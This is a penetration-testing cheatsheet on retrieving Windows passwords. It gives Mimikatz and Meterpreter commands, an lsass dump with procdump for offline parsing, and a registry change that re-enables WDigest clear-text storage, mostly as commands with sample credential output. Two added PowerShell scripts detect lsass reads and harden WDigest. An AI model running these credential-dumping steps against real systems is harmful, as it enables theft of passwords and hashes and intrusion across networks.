# Retrieve Windows passwords

## Introduction

Retrieving Windows clear text passwords allows an attacker to test for password reuse, move laterally, gain a foothold on a domain, and so on.

## Retrieve clear text passwords from memory

Windows historically stored clear text passwords in RAM, inside the lsass process. This lets users with admin privileges dump clear text passwords from memory with tools such as Mimikatz, wce, etc.

```bash
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
[...]
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
[...]
```

{% hint style="warning" %}
If you use Meterpreter on Win10 / Win2016, the only thing that works is the Kiwi WDigest module.
{% endhint %}

```bash
meterpreter > load kiwi 
Loading extension kiwi...

  .#####.   mimikatz 2.1.1 20170608 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

Success.
meterpreter > creds_wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

Username    Domain     Password
--------    ------     --------
(null)      (null)     (null)
WIN01$      WORKGROUP  (null)
localadmin  WIN01      L0c4l4dm1n
```

{% hint style="info" %}
**Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+**. The change was backported (KB2871997) as a reg key to Win7 / 8 / 2008R2 / 2012, but clear text storage is still enabled there.
{% endhint %}

## Minidump

To avoid detection during assessments, we can use the Minidump technique.

It consists in dumping the lsass process on the target computer with a legitimate tool ([Procdump by Sysinternals](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)), then parsing the dump locally on the attacker machine with [Mimikatz](https://github.com/gentilkiwi/mimikatz/releases) to retrieve the passwords.

On the target machine:

```bash
C:\WINDOWS\Sysinternals>procdump -accepteula -ma lsass.exe lsass.dmp
 
ProcDump v5.14 - Writes process dump files
Copyright (C) 2009-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards
 
Writing dump file C:\WINDOWS\Sysinternals\lsass.dmp ...
Writing 48MB. Estimated time (less than) 1 second.
Dump written.
```

To successfully extract passwords from this dump, copy it to a machine with the same major Windows version and the same architecture as the victim machine.


Then use Mimikatz:

```bash
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
 
mimikatz # sekurlsa::logonPasswords
 
Authentication Id : 0 ; 141237
User Name         : sekur_000
Domain            : WINDOWS-8
        msv :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
        tspkg :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * Password : waza1234/
        wdigest :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * Password : waza1234/
```

{% hint style="success" %}
Since **Mimikatz Nostalgia** (2019/05/04), you can parse any dump with any Windows version/architecture.
{% endhint %}
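As a defender-side counterpart to the lsass dumping described in the two sections above (Mimikatz `sekurlsa` and `procdump -ma lsass.exe` both open a handle to lsass with memory-read access), here is an added PowerShell hunt over Sysmon ProcessAccess events; it is not part of the original cheatsheet. It assumes Sysmon is installed and logging Event ID 10 for lsass.exe, and the allow-list of legitimate readers is a hypothetical starting point to tune per host.

```powershell
# Added example, not part of the original cheatsheet. Assumes Sysmon is installed
# with ProcessAccess (Event ID 10) logging for lsass.exe. The allow-list below is a
# hypothetical starting point; tune it to the host's real system processes.

$ProcessVmRead  = 0x0010   # PROCESS_VM_READ: required to read lsass memory
$AllowedSources = @(       # assumed legitimate lsass readers (hypothetical list)
    'C:\Windows\System32\csrss.exe',
    'C:\Windows\System32\wininit.exe',
    'C:\Windows\System32\services.exe'
)

function Get-LsassAccessEvents {
    param([datetime]$Since = (Get-Date).AddHours(-24))

    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 10
        StartTime = $Since
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $evt  = $_
        # Read named EventData fields from the XML instead of relying on positions.
        $data = @{}
        ([xml]$evt.ToXml()).Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }
        if ($data['TargetImage'] -notlike '*\lsass.exe') { return }

        $granted = [Convert]::ToInt32($data['GrantedAccess'], 16)   # e.g. "0x1FFFFF"
        $reads   = ($granted -band $ProcessVmRead) -ne 0
        $known   = $AllowedSources -contains $data['SourceImage']
        [pscustomobject]@{
            Time          = $evt.TimeCreated
            SourceImage   = $data['SourceImage']
            SourcePid     = $data['SourceProcessId']
            GrantedAccess = '0x{0:X}' -f $granted
            ReadsMemory   = $reads
            Suspicious    = $reads -and (-not $known)
        }
    }
}

# Usage: list unexpected lsass memory reads from the last day (procdump, a renamed
# copy of it, or an interactive Mimikatz session would all appear here).
Get-LsassAccessEvents | Where-Object Suspicious | Format-Table -AutoSize
```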

## WDigest

You can force Windows to store clear text credentials in memory again by simply modifying the value of the WDigest reg key. Clear text passwords will be stored once users log on again.

To enable it, change the key value to 1:

```bash
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
```

To disable it, change the key value to 0:

```bash
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 0
```

{% hint style="danger" %}
For the change to take effect, the following conditions must be met:

* Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
  * Adding requires **lock**
  * Removing requires **signout**
* Win10:
  * Adding requires **signout**
  * Removing requires **signout**
* Win2016:
  * Adding requires **lock**
  * Removing requires **reboot**
{% endhint %}

## Lock, sign out, and reboot from CMD

To lock a session, type:

```bash
rundll32.exe user32.dll,LockWorkStation
```

To sign out, type:

```bash
query session
logoff <sessionToClose_Number>
```

To reboot, type:

```bash
shutdown /r /t 0
```
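To check and harden the WDigest setting covered in the two sections above, here is an added PowerShell audit script; it is not part of the original cheatsheet. It reads `UseLogonCredential` from the key shown above, treats an absent value according to the OS rule stated on this page (off on Win8.1 / 2012R2+, still on for Win7 / 8 / 2008R2 / 2012), writes an explicit 0, and reports the sign-out or reboot the page's table says is needed afterwards; function names are my own.

```powershell
# Added example, not part of the original cheatsheet. Audits the WDigest
# UseLogonCredential value and sets it to 0 (the hardened state); the
# "action required" strings follow the page's own table.

$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

function Get-WDigestState {
    $os      = Get-CimInstance Win32_OperatingSystem
    $version = [version]$os.Version
    $value   = (Get-ItemProperty -Path $WDigestKey -Name UseLogonCredential `
                -ErrorAction SilentlyContinue).UseLogonCredential
    # The value may be absent. On Win8.1 / 2012R2 and later (6.3+) absence means
    # clear text storage is off; on Win7 / 8 / 2008R2 / 2012 it is still on.
    $modern  = $version -ge [version]'6.3'
    $stored  = if ($null -eq $value) { -not $modern } else { $value -eq 1 }
    $shown   = if ($null -eq $value) { '(absent)' } else { $value }
    [pscustomobject]@{
        Computer           = $env:COMPUTERNAME
        OSVersion          = $os.Version
        UseLogonCredential = $shown
        ClearTextStored    = $stored
    }
}

function Disable-WDigestClearText {
    # Write an explicit 0 so the state is unambiguous on every OS listed on the page.
    if (-not (Test-Path $WDigestKey)) { New-Item -Path $WDigestKey -Force | Out-Null }
    New-ItemProperty -Path $WDigestKey -Name UseLogonCredential -PropertyType DWord `
        -Value 0 -Force | Out-Null
    # Per the page's table: removing the setting needs a sign-out on Win7..2012R2
    # and Win10, but a reboot on Win2016 (server editions report ProductType 2 or 3).
    $os     = Get-CimInstance Win32_OperatingSystem
    $server = $os.ProductType -ne 1
    $action = if (([version]$os.Version).Major -ge 10 -and $server) { 'reboot' } else { 'sign out' }
    "UseLogonCredential set to 0; existing sessions keep clear text until users $action."
}

# Usage: report first, then run Disable-WDigestClearText where ClearTextStored is True.
Get-WDigestState
```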

## References

* [harmj0y](https://www.harmj0y.net/blog/redteaming/)
* [The hacker playbook 3](http://thehackerplaybook.com/dashboard/)
* [GentilKiwi's blog](http://blog.gentilkiwi.com/securite/mimikatz/minidump)
